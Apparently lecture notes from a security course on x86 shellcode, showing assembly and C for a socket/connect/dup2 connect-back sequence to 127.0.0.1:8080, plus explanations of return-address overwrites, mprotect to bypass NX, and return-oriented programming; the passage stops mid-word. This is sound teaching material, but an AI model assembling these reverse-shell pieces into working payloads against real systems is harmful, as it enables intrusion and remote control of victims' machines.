cs1650 - Lecture10 - Detailed Study Notes on Shell Coding, System Calls, and Code Reuse Techniques

Overview of Shell Coding and System Calls

Understanding the principles of shell coding, particularly in relation to system calls like socket, connect, and dup2.
Emphasis on minimizing code size, which is crucial for fitting shellcode into the small buffers available in many overflows, and on clever tricks for managing the execution flow and making the shellcode position-independent.

Introduction to Socket System Call

System call for creating a socket: socket.
Arguments to socket:
- Domain: AF_INET (value 2), for IPv4 Internet protocols.
- Type: SOCK_STREAM (value 1), for connection-oriented TCP sockets.
- Protocol: 0 (the default protocol for the type, which is TCP for SOCK_STREAM).
How to determine constants: consult header files (e.g., <sys/socket.h>), read man pages (e.g., man 2 socket), or write small C programs to print their values.
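A small C program along these lines prints the constants straight from the system headers. It is a sketch that assumes Linux with glibc, and the function name `print_socket_constants` is only illustrative. The `SYS_*` numbers come from `<sys/syscall.h>` and match the architecture you compile for. For example, `SYS_socket` is 41 on x86-64, not the 32-bit x86 value. To see the 32-bit numbers, compile with `-m32` (this requires the 32-bit headers to be installed).

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <netinet/in.h>   /* IPPROTO_TCP */
#include <sys/socket.h>   /* AF_INET, SOCK_STREAM */
#include <sys/syscall.h>  /* SYS_* numbers for the target architecture */

/* Print the constants a socket/connect/dup2 shellcode needs. */
void print_socket_constants(void)
{
    printf("AF_INET     = %d\n", AF_INET);
    printf("SOCK_STREAM = %d\n", SOCK_STREAM);
    printf("IPPROTO_TCP = %d\n", IPPROTO_TCP);
#ifdef SYS_socketcall
    printf("SYS_socketcall = %d\n", SYS_socketcall);  /* multiplexer, 32-bit x86 only */
#endif
#ifdef SYS_socket
    printf("SYS_socket  = %d\n", SYS_socket);
#endif
#ifdef SYS_connect
    printf("SYS_connect = %d\n", SYS_connect);
#endif
#ifdef SYS_dup2
    printf("SYS_dup2    = %d\n", SYS_dup2);  /* not defined on some newer ABIs */
#endif
}
```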

Implementation Steps for Socket Creation

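Store the socket system call number in the EAX register: 359 (0x167) on 32-bit x86 Linux, where the direct socket syscall has existed since Linux 4.3. Older kernels expose socket only through the socketcall multiplexer (102, 0x66). That interface takes SYS_SOCKET (1) in EBX and a pointer to an array of the three arguments in ECX.
Set the arguments in the EBX, ECX, and EDX registers:
- 2 (AF_INET) into EBX.
- 1 (SOCK_STREAM) into ECX.
- 0 (default protocol) into EDX.

Execute the int 0x80 instruction to make the system call. The new socket's file descriptor is returned in EAX; a negative value (-errno) indicates failure.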

; socket(AF_INET, SOCK_STREAM, 0) via the direct socket syscall (32-bit x86, Linux >= 4.3)
mov    eax, 0x167  ; syscall number 359 (0x167 in hex) for socket
; On older kernels use socketcall instead: eax = 0x66 (102), ebx = 1 (SYS_SOCKET),
; ecx = pointer to an argument array {2, 1, 0} in memory
mov    ebx, 0x2    ; AF_INET
mov    ecx, 0x1    ; SOCK_STREAM
mov    edx, 0x0    ; protocol 0
int    0x80
; EAX now holds the socket file descriptor (negative errno on failure)
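The same raw call can be made from C through glibc's `syscall()` wrapper. This is a sketch that assumes Linux with glibc; the name `raw_tcp_socket` is hypothetical. It passes the same three arguments the registers carry above. On x86-64, `SYS_socket` expands to that architecture's number rather than 359. If the headers define no direct socket syscall, the sketch falls back to the libc `socket()` function.

```c
#define _DEFAULT_SOURCE
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Create a TCP socket the way the shellcode does: a raw system call with
 * (AF_INET, SOCK_STREAM, 0). Returns the fd, or -1 with errno set. */
int raw_tcp_socket(void)
{
#ifdef SYS_socket
    /* Direct syscall: number in SYS_socket, three arguments in registers. */
    return (int)syscall(SYS_socket, AF_INET, SOCK_STREAM, 0);
#else
    /* Fallback for ABIs whose headers define no direct socket syscall. */
    return socket(AF_INET, SOCK_STREAM, 0);
#endif
}
```

Unlike the bare `int 0x80` sequence, `syscall()` converts a negative kernel return value into -1 and sets `errno`.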

Efficiency in Shell Code

Different encodings of the same operation can differ in size, which is critical for shellcode.
Using push and pop to transfer small values into registers often saves bytes compared with mov.
Example of encoding efficiency:
- To place the value 67 (0x43) into EAX with MOV: mov eax, 0x43 (5 bytes: B8 43 00 00 00). This encoding also contains three null bytes.
- With push of an 8-bit immediate: push 0x43 encodes as 6A 43 (2 bytes), followed by pop eax (1 byte: 58), for 3 bytes in total. The 8-bit immediate is sign-extended to 32 bits, so this trick works directly only for values from -128 to 127.
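The two encodings can be compared as raw bytes. This is a minimal sketch: the byte values are the ones listed above, and the array and function names are illustrative. It also checks for 0x00 bytes. This matters because a payload delivered through a string copy such as strcpy is cut off at the first null byte.

```c
#include <stdbool.h>
#include <stddef.h>

/* mov eax, 0x43 -> B8 imm32 (the 32-bit immediate carries three zero bytes) */
static const unsigned char mov_eax_0x43[] = { 0xB8, 0x43, 0x00, 0x00, 0x00 };
/* push 0x43 ; pop eax -> 6A imm8, 58 */
static const unsigned char push_pop_eax_0x43[] = { 0x6A, 0x43, 0x58 };

/* Return true if the encoded bytes contain 0x00. */
bool has_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return true;
    return false;
}
```

The push/pop form is both shorter (3 bytes instead of 5) and free of null bytes.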

Sequence of Instructions

Using various instructions to manipulate register values and the stack:
- MOV to place immediate values or register contents into other registers or memory.
- POP to retrieve values from the top of the stack into registers.
- INC (increment) and DEC (decrement) to adjust register values with very short instructions (1 byte each for a 32-bit register). These are often used to reach values such as 0, 1, 2 or small offsets.

Data Structure for Connection via `connect`

Details on the sockaddr_in structure passed to the connect call, which defines the target address:
1. sin_family: address family (2 bytes, AF_INET, value 2). Unlike the other fields, this one is stored in host byte order.
2. sin_port: port (2 bytes, e.g., 8080). This must be in network byte order.
3. sin_addr: IPv4 address (4 bytes, e.g., 127.0.0.1). This must also be in network byte order.
4. sin_zero: 8 bytes of padding, normally zero, which bring the structure to 16 bytes.
Layout of the sockaddr_in structure in memory (conceptual):

+------------------------------+ <-- address of the structure (e.g., ESP)
| sin_family: AF_INET (2)      |  2 bytes, host byte order (bytes 02 00 on x86)
+------------------------------+
| sin_port: 8080 (0x1F90)      |  2 bytes, network byte order (bytes 1F 90)
+------------------------------+
| sin_addr: 127.0.0.1          |  4 bytes, network byte order (bytes 7F 00 00 01,
|                              |  read as 0x0100007F by a little-endian 32-bit load)
+------------------------------+
| sin_zero: padding            |  8 bytes of zeros
+------------------------------+ <-- total size: 16 bytes
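The layout can be checked against the real header definition. This is a sketch assuming Linux/glibc; the function name `build_loopback_addr` is hypothetical. The static assertions encode the field offsets and total size from the diagram. The function fills the fields with the byte orders described above.

```c
#define _DEFAULT_SOURCE
#include <arpa/inet.h>    /* htons, inet_pton */
#include <netinet/in.h>   /* struct sockaddr_in */
#include <stddef.h>       /* offsetof */
#include <string.h>       /* memset */
#include <sys/socket.h>   /* AF_INET */

/* Family at offset 0, port at 2, address at 4, 16 bytes in total. */
_Static_assert(offsetof(struct sockaddr_in, sin_port) == 2, "sin_port offset");
_Static_assert(offsetof(struct sockaddr_in, sin_addr) == 4, "sin_addr offset");
_Static_assert(sizeof(struct sockaddr_in) == 16, "sockaddr_in size");

/* Fill *out with AF_INET, 127.0.0.1 and `port` (given in host byte order).
 * Returns 1 on success, as inet_pton does. */
int build_loopback_addr(struct sockaddr_in *out, unsigned short port)
{
    memset(out, 0, sizeof *out);                          /* zero sin_zero padding */
    out->sin_family = AF_INET;                            /* host byte order */
    out->sin_port = htons(port);                          /* network byte order */
    return inet_pton(AF_INET, "127.0.0.1", &out->sin_addr);  /* network byte order */
}
```

On a little-endian machine such as x86, dumping the bytes for port 8080 gives 02 00 1F 90 7F 00 00 01 followed by eight zeros, matching the diagram.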

Connection Sequence

Execute the connect system call after socket creation has produced a file descriptor.
Pass the socket file descriptor returned by socket as the first argument (in EBX).
Build the sockaddr_in structure on the stack with the target IP and port.
The second argument (in ECX) is a pointer to this structure (e.g., ESP right after the structure has been pushed).
The third argument (in EDX) is the size of the structure (16 bytes for sockaddr_in).

Use int 0x80 to make the connect call, then check EAX for the result. It holds 0 on success or a negative errno value on failure; the libc wrapper turns the latter into -1 and sets errno.

; connect(sockfd, &addr, sizeof(addr)) on 32-bit x86 Linux
; Assumes EAX still holds the fd returned by the socket call above
mov    ebx, eax       ; EBX = sockfd (arg 1); also reused by the dup2 step
xor    edx, edx       ; EDX = 0
push   edx            ; sin_zero bytes 4..7 = 0
push   edx            ; sin_zero bytes 0..3 = 0
push   0x0100007f     ; sin_addr = 127.0.0.1 (bytes 7F 00 00 01, network byte order)
push   word 0x901f    ; sin_port = 8080 (bytes 1F 90, network byte order)
push   word 0x2       ; sin_family = AF_INET (bytes 02 00, host byte order)
mov    ecx, esp       ; ECX = pointer to sockaddr_in (arg 2)
mov    dl, 0x10       ; EDX = 16 = sizeof(struct sockaddr_in) (arg 3)
mov    eax, 0x16a     ; syscall number 362 (0x16a) for connect (Linux >= 4.3)
int    0x80
; EAX = 0 on success, negative errno on failure

; Older kernels: replace the last two instructions with socketcall,
; which takes the three connect arguments as an array in memory
push   edx            ; args[2] = 16
push   ecx            ; args[1] = pointer to sockaddr_in
push   ebx            ; args[0] = sockfd
mov    ecx, esp       ; ECX = pointer to the argument array
mov    ebx, 0x3       ; SYS_CONNECT (overwrites EBX, so save sockfd elsewhere first)
mov    eax, 0x66      ; syscall number 102 (0x66) for socketcall
int    0x80
; EAX = 0 on success, negative errno on failure
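The connection sequence can be mirrored in C. This is a sketch assuming Linux and a working loopback interface. `connect_loopback` follows the steps listed above. `listen_loopback` is a hypothetical helper included only so the sequence can be tried locally: it targets a port chosen by the kernel instead of 8080.

```c
#define _DEFAULT_SOURCE
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Helper for local testing: listen on 127.0.0.1 with a kernel-chosen port and
 * report that port (host byte order) in *port. Returns the listening fd or -1. */
int listen_loopback(unsigned short *port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = 0;                                  /* let the kernel pick a port */
    socklen_t len = sizeof a;
    if (bind(fd, (struct sockaddr *)&a, sizeof a) < 0 || listen(fd, 1) < 0 ||
        getsockname(fd, (struct sockaddr *)&a, &len) < 0) {
        close(fd);
        return -1;
    }
    *port = ntohs(a.sin_port);
    return fd;
}

/* The shellcode's steps: socket(), fill sockaddr_in, connect(fd, &addr, 16).
 * Returns the connected fd or -1. */
int connect_loopback(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);        /* first argument for connect */
    if (fd < 0)
        return -1;
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);                   /* zero the sin_zero padding */
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);                     /* network byte order */
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);   /* 127.0.0.1 */
    if (connect(fd, (struct sockaddr *)&addr, sizeof addr) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

The connect succeeds without an accept() call, because the kernel completes the handshake for a listening socket on its own.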

Duplication of File Descriptors

Use the dup2 system call to duplicate the socket file descriptor onto standard input (0), standard output (1), and standard error (2). This redirects all three to the established socket, so a program run afterwards (typically a shell) does its I/O over the connection.
The dup2 syscall number on 32-bit Linux x86 is 63 (0x3F).

Sequence of operations for duplicating the socket file descriptor (oldfd) onto stdin, stdout, and stderr (newfd):

The dup2 syscall requires:
- EAX must hold 0x3F (decimal 63).
- EBX must hold the oldfd (the socket file descriptor).
- ECX must hold the newfd (2, then 1, then 0).

; dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0)
mov    ebx, sock_fd_value ; oldfd: the socket fd (placeholder for wherever it was kept)
mov    ecx, 0x2       ; start with newfd = 2 (stderr)
loop_dup:
    mov    eax, 0x3f   ; syscall number 63 (0x3F) for dup2; reloaded on every pass
                       ; because int 0x80 overwrites EAX with the return value
    int    0x80
    dec    ecx         ; next newfd (2 -> 1 -> 0 -> -1)
    jns    loop_dup    ; repeat while ECX >= 0, i.e. for 2, 1 and 0
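In C the same loop is a countdown over dup2(). This is a sketch; `dup_onto_range` and `redirect_stdio` are hypothetical names. The general helper exists so the logic can be exercised on spare descriptors without disturbing the real standard streams.

```c
#define _DEFAULT_SOURCE
#include <unistd.h>

/* Mirror of the assembly loop: dup2(oldfd, newfd) for newfd = last, last-1, ..., first.
 * Returns 0 on success or -1 as soon as a dup2 call fails. */
int dup_onto_range(int oldfd, int first, int last)
{
    for (int newfd = last; newfd >= first; newfd--)   /* like "dec ecx ; jns" */
        if (dup2(oldfd, newfd) < 0)
            return -1;
    return 0;
}

/* What the shellcode does: stderr, stdout and stdin all become the socket. */
int redirect_stdio(int sockfd)
{
    return dup_onto_range(sockfd, 0, 2);
}
```

The countdown order only matters in assembly, where `jns` ends the loop without a separate compare. The C version keeps that order purely to mirror the assembly.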

Handling Control Flow Hijacking

The process of hijacking the control flow, typically via overwriting return addresses on the stack during a buffer overflow.
This allows an attacker to steer program execution from its legitimate path to arbitrary shellcode injected into memory.
When a function returns, the EIP (instruction pointer) is loaded with the address stored at the top of the stack. By overwriting this address with the entry point of injected shellcode, control is transferred.
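To make the return-address overwrite concrete without running vulnerable code, the sketch below models a 32-bit stack frame as a plain byte array. The layout is an assumption for illustration: a 16-byte buffer, then the saved EBP, then the return address. All names are hypothetical, and real frame layouts depend on the compiler and its flags.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical frame, lowest address first:
 * [0..15] char buf[16], [16..19] saved EBP, [20..23] saved return address. */
enum { BUF_SIZE = 16, SAVED_EBP_OFF = 16, RET_OFF = 20, FRAME_SIZE = 24 };

/* Copy into buf without checking BUF_SIZE, as strcpy or gets would.
 * A real overflow keeps writing past the frame; the clamp keeps this model in bounds. */
void unchecked_copy(uint8_t frame[FRAME_SIZE], const uint8_t *input, size_t len)
{
    memcpy(frame, input, len < FRAME_SIZE ? len : FRAME_SIZE);
}

/* The value ret would load into EIP: the little-endian word at RET_OFF. */
uint32_t saved_return_address(const uint8_t frame[FRAME_SIZE])
{
    return (uint32_t)frame[RET_OFF] | (uint32_t)frame[RET_OFF + 1] << 8 |
           (uint32_t)frame[RET_OFF + 2] << 16 | (uint32_t)frame[RET_OFF + 3] << 24;
}
```

A 16-byte input stays inside buf. A 24-byte input reaches offset 20 and replaces the saved return address. In the test it is replaced with 0xbffff010, a made-up stack address standing in for where injected shellcode would sit.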

Non-Executable Memory and Code Reuse

Introduction of non-executable pages (e.g., Data Execution Prevention, the NX bit) as a defense that prevents executing code from data regions such as the stack or heap.
Explanation of the mprotect system call for changing memory permissions (e.g., adding PROT_EXEC to make a page executable). mprotect takes addr (start address, which must be page-aligned), len (length of the region), and prot (protection flags such as PROT_READ | PROT_WRITE | PROT_EXEC).
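A call to mprotect on an arbitrary address has to respect the page-alignment rule. This is a sketch assuming Linux/glibc; `protect_range` is a hypothetical name. It rounds the start address down to a page boundary before calling mprotect. The length does not need rounding, because the kernel rounds it up to whole pages itself.

```c
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

/* Apply `prot` (e.g. PROT_READ | PROT_EXEC) to the pages covering [addr, addr + len).
 * Returns 0 on success, or -1 with errno set, exactly like mprotect(). */
int protect_range(void *addr, size_t len, int prot)
{
    uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t start = (uintptr_t)addr & ~(page - 1);        /* round down to a page */
    size_t span = (size_t)((uintptr_t)addr + len - start);  /* still covers the range */
    return mprotect((void *)start, span, prot);
}
```

An exploit that can call mprotect typically passes the address of its injected buffer. Once the covering page is executable, NX no longer blocks a jump into that buffer.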

Code Injection Techniques

Discussion of bypassing non-executable memory protections without injecting any new executable code.
How to leverage code already present in memory (e.g., in shared libraries such as libc) instead of injecting new assembly code.
This method, known as Return-Oriented Programming (ROP), involves chaining small sequences of existing instructions (called "gadgets") that end in a ret instruction. By carefully controlling the stack, these gadgets can be executed in sequence to perform arbitrary operations, effectively creating new logic from existing code.
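The chaining mechanism can be illustrated with a toy interpreter rather than real gadgets. Each "gadget" is a C function standing in for a short instruction sequence ending in ret. The chain is an array of words that the loop consumes the way ret consumes the stack. The gadget addresses, register set, and names are all hypothetical; this models the control flow only and executes no real library code.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical addresses at which the gadgets "live" in a loaded library. */
enum {
    GADGET_POP_EAX     = 0x08049010,  /* pop eax ; ret */
    GADGET_POP_EBX     = 0x08049020,  /* pop ebx ; ret */
    GADGET_ADD_EAX_EBX = 0x08049030   /* add eax, ebx ; ret */
};

/* Toy CPU state: two registers and the attacker-controlled stack. */
typedef struct {
    uint32_t eax, ebx;
    const uint32_t *stack;
    size_t esp;   /* index of the next stack word */
    size_t len;
} cpu_state;

/* Read the word at ESP and advance ESP, as pop does (0 if the chain ran out). */
static uint32_t pop_word(cpu_state *c)
{
    return c->esp < c->len ? c->stack[c->esp++] : 0;
}

/* Gadget bodies; the trailing ret is modeled by run_chain's loop. */
static void pop_eax(cpu_state *c)     { c->eax = pop_word(c); }
static void pop_ebx(cpu_state *c)     { c->ebx = pop_word(c); }
static void add_eax_ebx(cpu_state *c) { c->eax += c->ebx; }

typedef void (*gadget_fn)(cpu_state *);

static gadget_fn lookup_gadget(uint32_t addr)
{
    switch (addr) {
    case GADGET_POP_EAX:     return pop_eax;
    case GADGET_POP_EBX:     return pop_ebx;
    case GADGET_ADD_EAX_EBX: return add_eax_ebx;
    default:                 return NULL;   /* not a known gadget */
    }
}

/* Emulate repeated ret: pop a "return address" and run the gadget found there,
 * until the chain is exhausted or an unknown address appears. Returns final EAX. */
uint32_t run_chain(const uint32_t *stack, size_t len)
{
    cpu_state c = { 0, 0, stack, 0, len };
    while (c.esp < c.len) {
        gadget_fn g = lookup_gadget(pop_word(&c));   /* ret: EIP = [ESP]; ESP += 4 */
        if (g == NULL)
            break;
        g(&c);
    }
    return c.eax;
}
```

The chain { GADGET_POP_EAX, 5, GADGET_POP_EBX, 7, GADGET_ADD_EAX_EBX } leaves 12 in EAX. Each data word sits on the stack directly after the gadget that pops it, which is the arrangement a stack diagram of a real ROP chain shows.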

Structuring Shell Code for Execution

Crafting shellcode (or ROP chains) so that it can return control to functions already present in the program after executing its payload, or perform complex operations by chaining gadgets.
Drawing diagrams of where the stack pointer (ESP) points during controlled execution. These show how return addresses are arranged to call gadgets and how function arguments are laid out on the stack.

Conclusion and Future Directions

Continued exploration of the nuances in bypassing memory protections through direct control of memory and exploitation techniques.
High-